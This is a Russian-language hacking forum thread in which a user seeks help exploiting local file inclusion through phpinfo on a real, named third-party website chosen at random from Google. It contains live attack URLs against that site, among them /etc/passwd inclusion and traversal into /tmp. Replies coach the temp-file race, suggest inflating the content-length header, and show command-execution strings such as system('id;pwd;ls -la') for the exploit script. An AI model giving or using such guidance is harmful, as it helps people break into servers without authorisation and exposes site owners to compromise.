Старый 31.10.2011, 23:45   #1
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию Помощь в LFI через phpinfo

Здравствуйте. Помогите пожалуйста разобраться в LFI через phpinfo. В виду отсутствия опыта потратил вчера около 5 часов и сегодня сижу второй час, но толку ноль.
Прочитал одноименную тему вдоль и поперек 10 раз, в качестве полигона был выбран рандомный сайт из гугла www.continuum2.com/phpinfo.php. Закинул на локалхост оба скрипта из поста №16.
Первый выдал следующий результат:
Цитата:
www.continuum2.com/phpinfo.php
Прочитали файл
/tmp/phpWcfoN4

Шелл залит в
/tmp/phpWcfoN4

Или проверьте
/tmp/phpWcfoN4
/tmp/phpWcfoN4

Если шелл не нашелся, повторите скрипт.
То есть как я понимаю, теперь минишелл лежит на сервере. Теперь нужно его приинклудить каким-то образом через phpinfo, но как - я так и не понял.
К слову, на сайте есть такой инклуд
Цитата:
www.continuum2.com/index.php?file=%2Fetc%2Fpasswd
Пробовал через него - http://www.continuum2.com/index.php?file=%2Ftmp%2FphpWcfoN4 - выдает ошибку.

Пробовал юзать второй скрипт - поставил $rg 1 (только инклуд), в качестве страницы для инклуда передал тот же пхпинфо - инклудит. Но опять таки не понимаю, что писать в поле вместо http://localhost/g.php?eid= что бы проинклудился минишелл.
PHP код:
$inc 'http://localhost/g.php?eid='.base64_encode($cmd).'&f=../../../../../../..'
Очень прошу, обьясните матчасть.
a10nE вне форума   Ответить с цитированием
Старый 01.11.2011, 00:19   #2
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от a10nE
То есть как я понимаю, теперь минишелл лежит на сервере
Не лежит. Временный файл существует только во время запроса. Укажи в хидере content-length больше, чем на самом деле и успевай проинклудить пока не истек таймаут.
M_script вне форума   Ответить с цитированием
Старый 01.11.2011, 00:38   #3
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию

M_script, большое спасибо за ответ. То есть файл с минишеллом живет ничтожно мало? И инклудить его нужно программно в том же скрипте, что и заливает, чтоб успеть? Или руками тоже можно, если не мешкать?
a10nE вне форума   Ответить с цитированием
Старый 01.11.2011, 01:06   #5
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию

http://www.continuum2.com/index.php?file=%2F..%2F..%2F..%2Ftmp%2FphpOu6j2d

Пишет что ошибка Failed opening '/../../../tmp/phpOu6j2d' for inclusion.

Что я делаю не так?

А вот еррор-лог инклудит: http://www.continuum2.com/index.php?file=/home/continu1/public_html/error_log
a10nE вне форума   Ответить с цитированием
Старый 01.11.2011, 06:57   #6
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от a10nE Посмотреть сообщение
http://www.continuum2.com/index.php?file=%2F..%2F..%2F..%2Ftmp%2FphpOu6j2d

Пишет что ошибка Failed opening '/../../../tmp/phpOu6j2d' for inclusion.

Что я делаю не так?

А вот еррор-лог инклудит: http://www.continuum2.com/index.php?file=/home/continu1/public_html/error_log
а ты уверен, что файл /tmp/phpOu6j2d во время инклуда еще не удалился и присутствует?
Twost вне форума   Ответить с цитированием
Старый 01.11.2011, 07:38   #7
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

FIXER, от каких настроек сервера зависит время хранения временных файлов при загрузке? Всегда думал, что они хранятся только до завершения выполнения скрипта.
M_script вне форума   Ответить с цитированием
Старый 01.11.2011, 09:30   #8
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от a10nE Посмотреть сообщение
в качестве полигона был выбран рандомный сайт из гугла www.continuum2.com/phpinfo.php.
Очень прошу, обьясните матчасть.
Первый скрипт из поста 16 работает только на windows.
Если посмотреть вывод phpinfo(), то System =
Linux cobra.hawkhost.com 2.6.18-338.5.1.el5.lve0.8.29 #1 SMP Sat Apr 23 01:52:48 EEST 2011 x86_64

т.е. работать не будет.

Если сработал второй скрипт, ключ $rg=1 говорит, что работаем в том же режиме , что и оригинальный скрипт от asddas, то команда задается в строке
$cmd = 'system("ps aux")';
Вставьте свою, например
$cmd = 'system("id;pwd;ls -la")';

Минишелл в этом режиме существует только во время выполнения скрипта

Возможно скрипты из постов 2, 7, 11 Вам подойдут больше.

===========

Про работу под win вроде бы понятно писал в том же посте 16.
Файл после выполнения скрипта хранится достаточно долго 5, 10, 20 минут точно не мерил,
но всегда хватало времени, неторопливо его проинклудить.
nikp вне форума   Ответить с цитированием
Старый 01.11.2011, 16:09   #9
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию

Огромное спасибо всем за ответы, у вас отличный форум!
a10nE вне форума   Ответить с цитированием
Старый 01.11.2011, 16:40   #10
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Цитата:
Сообщение от M_script Посмотреть сообщение
FIXER, от каких настроек сервера зависит время хранения временных файлов при загрузке? Всегда думал, что они хранятся только до завершения выполнения скрипта.
Да, файлы хранятся до завершения скрипта, но скрипт выполняется до max_execution_time, что 15-20 минут обычно.
Небольшая тонкость в том, что эксплойт (моя версия, по крайней мере) не может отследить момент завершения скрипта на сервере (и удаления файла, соответственно).


Цитата:
Сообщение от M_script Посмотреть сообщение
Не лежит. Временный файл существует только во время запроса. Укажи в хидере content-length больше, чем на самом деле и успевай проинклудить пока не истек таймаут.
Это неправильный ответ :)

Последний раз редактировалось tipsy; 01.11.2011 в 16:59..
tipsy вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot